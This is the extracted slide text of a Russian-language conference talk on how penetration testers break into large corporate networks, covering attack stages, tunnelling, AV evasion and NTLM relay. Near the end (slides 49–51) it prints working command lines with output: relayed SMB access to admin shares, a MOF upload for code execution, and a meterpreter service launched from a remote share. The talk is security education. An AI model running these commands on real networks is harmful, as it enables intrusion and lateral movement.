Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

Истории из жизни. Как взламывают сети крупных организаций.

  • Identifiez-vous pour voir les commentaires

Истории из жизни. Как взламывают сети крупных организаций.

  1. 1. Истории из жизни. Как взламываютсети крупных организаций.Дмитрий Евтеев
  2. 2. Что такое крупная сеть?- информационная система, в которой > 1.000 пользователейАрхитектура крупной сети предполагает:• Централизованное управление• Единый источник идентификаторов• Единая точка аутентификации и авторизации• Территориальная распределенностьВведение
  3. 3. Веб-приложенияИнтерфейсы администрирования…и прочий «зоопарк»DNS, интерфейсы обработки электронных сообщений, FTP,интерфейсы СУБД, LDAP, VPN/IPSEC, Netbios/SMB, Proxy/Socks, SNMP,NTP…Что содержится на периметре
  4. 4. ТелекомНа большом количестве сетевых устройств, найдутся такие, гдеиспользуются дефолты.ПромышленностьНа большом количестве идентификаторов пользователей, найдутсятакие, которые используют слабые пароли к удаленному перебору.Интересные наблюдения (по отрасли)
  5. 5. ГоссекторНеоправданно высокое внимание к отдельным направлениямобеспечения ИБ, наравне с отсутствием внимания к ИБ в целом.Финансовый секторПристальное внимание только к системам, обрабатывающим данныедержателей пластиковых карт, позволяет использовать уязвимости всмежных системах.Интересные наблюдения (по отрасли)
  6. 6. Россия• Linux/Apache/MySQL/PHP (LAMP)Индия• Linux/Tomcat/Oracle&DB2/JavaКитай• Windows/IIS/MSSQL/ASP.NETИнтересные наблюдения (по региону)
  7. 7. Основные этапы проведения атакиВыявление целей и сбор данных об объектахисследованияСокрытиеследовПоиск и эксплуатация уязвимостейСбор данных с новым уровнем доступаПовышение привилегийСбор данных с новым уровнем доступаРазвитие атаки с имеющимися привилегиямиЗакрепление своего присутствия
  8. 8. Соблюдение законовНапример: низя читать электронную поштуОграниченное времяМинимизация воздействияНапример: низя «убивать» аверовОтчетностьИногда требуется протокол всех совершаемых действий…помимо пятисот страничного технического отчетаОговорка по пентестам
  9. 9. Nmap, Nessus, etc.Rapid7 Metasploit FrameworkImmunity CANVASCORE ImpactSAINTexploitДругие источники:• public eq exploit-db.com• private …Поиск и эксплуатация уязвимостей
  10. 10. Доставка полезной нагрузкиОбеспечение «транспорта»Задачи, которые стоят перед атакующим
  11. 11. Обеспечение «транспорта» (сценарий 1)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  12. 12. Обеспечение «транспорта» (сценарий 1)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  13. 13. Обеспечение «транспорта» (сценарий 1)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  14. 14. Обеспечение «транспорта» (сценарий 1)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
  15. 15. Обеспечение «транспорта» (сценарий 1)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  16. 16. История из жизни («транспорт» через proxy)АРМ аудитораИнтернет123458101291413151617
  17. 17. Обеспечение «транспорта» (сценарий 2)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  18. 18. Обеспечение «транспорта» (сценарий 2)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  19. 19. Обеспечение «транспорта» (сценарий 2)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  20. 20. Обеспечение «транспорта» (сценарий 2)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  21. 21. История из жизни (реакция админа на tsh)
  22. 22. Обеспечение «транспорта» (сценарий 3)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  23. 23. Обеспечение «транспорта» (сценарий 3)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)http://http-tunnel.sourceforge.net/http://sensepost.com/labs/tools/pentest/reduhhttp://sourceforge.net/projects/webtunnel/
  24. 24. Обеспечение «транспорта» (сценарий 3)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)http://http-tunnel.sourceforge.net/http://sensepost.com/labs/tools/pentest/reduhhttp://sourceforge.net/projects/webtunnel/
  25. 25. Обеспечение «транспорта» (сценарий 3)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)http://http-tunnel.sourceforge.net/http://sensepost.com/labs/tools/pentest/reduhhttp://sourceforge.net/projects/webtunnel/
  26. 26. История из жизни («транспорт» и доставка полезнойнагрузки через Lotus Domino)
  27. 27. «Транспорт» может быть разным…
  28. 28. За что я люблю крупные сети
  29. 29. Обход ограничений безопасностиhttp://devteev.blogspot.ru/2012/10/windows.html
  30. 30. Rapid7 Metasploit Framework :: meterpreterImmunity CANVAS :: MOSDEFCORE Impact :: Syscall Proxy AgentSAINTexploitПост-эксплуатация
  31. 31. Как обходятся аверы (1/3)
  32. 32. Как обходятся аверы (2/3)
  33. 33. Как обходятся аверы (3/3)
  34. 34. Как обходятся аверы (3/3)http://blog.gentilkiwi.com/mimikatz
  35. 35. Первостепенная цель атакующего - IAM / IDM
  36. 36. Но, как часто это бывает…
  37. 37. http://devteev.blogspot.ru/2012/02/drg-8-microsoft.htmlКак взламывают сети Microsoft
  38. 38. LM - LAN ManagerNTLM - NT LAN ManagerNTLMv2KerberosПротоколы аутентификации в сетях Microsoft
  39. 39. NTLM аутентификацияhttp://squirtle.googlecode.com/files/NTLM%20is%20Dead%20-%20DefCon%2016.pdf
  40. 40. NTLM-Relayhttp://webstersprodigy.net/2012/07/22/metasploit-generic-ntlm-relay-module/
  41. 41. Аутентификация по NTLMv1
  42. 42. Альтернатива NTLM-Relay (1/2)Mark Gamache,http://markgamache.blogspot.ru/2013/01/ntlm-challenge-response-is-100-broken.html
  43. 43. Альтернатива NTLM-Relay (1/2)Mark Gamache,http://markgamache.blogspot.ru/2013/01/ntlm-challenge-response-is-100-broken.html
  44. 44. Альтернатива NTLM-Relay (2/2)http://www.ampliasecurity.com/research/wcefaq.html
  45. 45. Owned in 60 seconds with ZackAttack (1/7)Zack Fase (@zfasel),https://github.com/zfasel/ZackAttack
  46. 46. Owned in 60 seconds with ZackAttack (2/7)
  47. 47. HTTP -> SMB NTLM relayOwned in 60 seconds with ZackAttack (3/7)
  48. 48. Owned in 60 seconds with ZackAttack (4/7)
  49. 49. ~# proxychains smbclient -U DNPRODUCTIE/admin%any //192.168.1.1/C$ProxyChains-3.1 (http://proxychains.sf.net)|S-chain|-<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OKDomain=[DNPRODUCTIE] OS=[Windows Server 2003 3790 Service Pack 2]Server=[Windows Server 2003 5.2]smb: > lsAUTOEXEC.BAT A 0 Mon Jan 28 10:20:37 2013boot.ini AHS 213 Mon Jan 28 09:53:27 2013...~# proxychains smbclient -U DNPRODUCTIE/admin%any //192.168.1.2/C$~# proxychains net rpc user -U"DNPRODUCTIE/admin"%"any" -S 192.168.1.1ProxyChains-3.1 (http://proxychains.sf.net)|DNS-response|: bt is not exist|S-chain|-<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OKadminIUSR_WADIWAM_WADkrbtgt...Owned in 60 seconds with ZackAttack (5/7)
  50. 50. exec over winmgmt~/mof# proxychains smbclient -U"WGW/ADMIN"%"any" //192.168.1.1/ADMIN$ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OKDomain=[DNPRODUCTIE] OS=[Windows Server 2003 3790 Service Pack 2]Server=[Windows Server 2003 5.2]smb: > cd system32/wbem/mofsmb: system32wbemmof> put q.mofputting file q.mof as system32wbemmofq.mof (1173.8 kb/s) (average 1173.8kb/s)smb: system32wbemmof>респект Вячеславу Егошину @vegoshinOwned in 60 seconds with ZackAttack (6/7)
  51. 51. exec over metsvc~# proxychains net rpc service create meterpreter meterpreter"192.168.1.5testmetsvc.exe service" -U"WGW/ADMIN"%"any" -S 192.168.1.1ProxyChains-3.1 (http://proxychains.sf.net)|S-chain|-<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OKSuccessfully created Service: meterpreter~# proxychains net rpc service start meterpreter -U"WGW/ADMIN"%"any" -S192.168.1.1Owned in 60 seconds with ZackAttack (7/7)
  52. 52. Реализация успешного сценария атаки – это какправило использование больше одной уязвимостиЧем больше по размеру информационная система, тембольше возможных путей для реализации атакВместо заключения: простые истины
  53. 53. Спасибо за внимание!sdevteev@gmail.comhttp://devteev.blogspot.comhttps://twitter.com/devteev

×